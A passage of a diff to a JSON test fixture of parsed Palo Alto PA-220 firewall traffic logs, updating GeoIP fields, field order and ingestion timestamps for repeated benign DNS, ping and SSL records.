16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", @@ -1004,26 +974,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1136,7 +1101,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031475800Z", + "ingested": "2021-12-14T14:51:01.287199053Z", "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", @@ -1164,26 +1129,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 3732, - "ip": "175.16.199.1", - "packets": 9 + "packets": 9, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1305,7 +1265,7 @@ }, "event": { "duration": 15000000000, - "ingested": "2021-12-09T13:44:05.031481100Z", + "ingested": "2021-12-14T14:51:01.287199439Z", "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", @@ -1333,26 +1293,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 221, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1474,7 +1429,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031486600Z", + "ingested": "2021-12-14T14:51:01.287199756Z", "original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:22.000-05:00", "timezone": "America/New_York", @@ -1502,26 +1457,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 221, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1643,7 +1593,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031492100Z", + "ingested": "2021-12-14T14:51:01.287200078Z", "original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:23.000-05:00", "timezone": "America/New_York", @@ -1671,26 +1621,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5469, - "ip": "175.16.199.1", - "packets": 16 + "packets": 16, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1812,7 +1757,7 @@ }, "event": { "duration": 593000000000, - "ingested": "2021-12-09T13:44:05.031497500Z", + "ingested": "2021-12-14T14:51:01.287200389Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -1840,26 +1785,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 224, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1981,7 +1921,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031503Z", + "ingested": "2021-12-14T14:51:01.287200926Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -2009,26 +1949,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 117, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2150,7 +2085,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031508400Z", + "ingested": "2021-12-14T14:51:01.287201259Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -2178,26 +2113,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 307, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2319,7 +2249,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031513800Z", + "ingested": "2021-12-14T14:51:01.287201582Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -2347,26 +2277,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 365, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2488,7 +2413,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031519200Z", + "ingested": "2021-12-14T14:51:01.287201900Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -2516,26 +2441,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2648,7 +2568,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031524600Z", + "ingested": "2021-12-14T14:51:01.287202213Z", "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", @@ -2676,26 +2596,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 161, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2817,7 +2732,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:44:05.031530100Z", + "ingested": "2021-12-14T14:51:01.287202693Z", "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", @@ -2845,26 +2760,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 7805, - "ip": "175.16.199.1", - "packets": 13 + "packets": 13, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2986,7 +2896,7 @@ }, "event": { "duration": 17000000000, - "ingested": "2021-12-09T13:44:05.031535500Z", + "ingested": "2021-12-14T14:51:01.287203038Z", "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", @@ -3014,26 +2924,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 6106, - "ip": "175.16.199.1", - "packets": 11 + "packets": 11, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3155,7 +3060,7 @@ }, "event": { "duration": 17000000000, - "ingested": "2021-12-09T13:44:05.031541Z", + "ingested": "2021-12-14T14:51:01.287203356Z", "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", @@ -3183,26 +3088,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 196, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3315,7 +3215,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031546500Z", + "ingested": "2021-12-14T14:51:01.287203683Z", "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", @@ -3343,26 +3243,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 3245, - "ip": "175.16.199.1", - "packets": 17 + "packets": 17, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3484,7 +3379,7 @@ }, "event": { "duration": 116000000000, - "ingested": "2021-12-09T13:44:05.031551100Z", + "ingested": "2021-12-14T14:51:01.287204010Z", "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", @@ -3512,26 +3407,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 179, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3653,7 +3543,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031555400Z", + "ingested": "2021-12-14T14:51:01.287204390Z", "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", @@ -3681,26 +3571,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 4537, - "ip": "175.16.199.1", - "packets": 12 + "packets": 12, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3822,7 +3707,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031560800Z", + "ingested": "2021-12-14T14:51:01.287204720Z", "original": "Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:30.000-05:00", "timezone": "America/New_York", @@ -3850,26 +3735,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 4282, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3991,7 +3871,7 @@ }, "event": { "duration": 13000000000, - "ingested": "2021-12-09T13:44:05.031566600Z", + "ingested": "2021-12-14T14:51:01.287205150Z", "original": "Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:32.000-05:00", "timezone": "America/New_York", @@ -4019,26 +3899,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4151,7 +4026,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031570500Z", + "ingested": "2021-12-14T14:51:01.287205476Z", "original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:33.000-05:00", "timezone": "America/New_York", @@ -4179,26 +4054,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 130, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4320,7 +4190,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031575Z", + "ingested": "2021-12-14T14:51:01.287205803Z", "original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:34.000-05:00", "timezone": "America/New_York", @@ -4345,26 +4215,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 1991, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4486,7 +4351,7 @@ }, "event": { "duration": 15000000000, - "ingested": "2021-12-09T13:44:05.031580400Z", + "ingested": "2021-12-14T14:51:01.287206195Z", "original": "Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:37.000-05:00", "timezone": "America/New_York", @@ -4511,26 +4376,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - 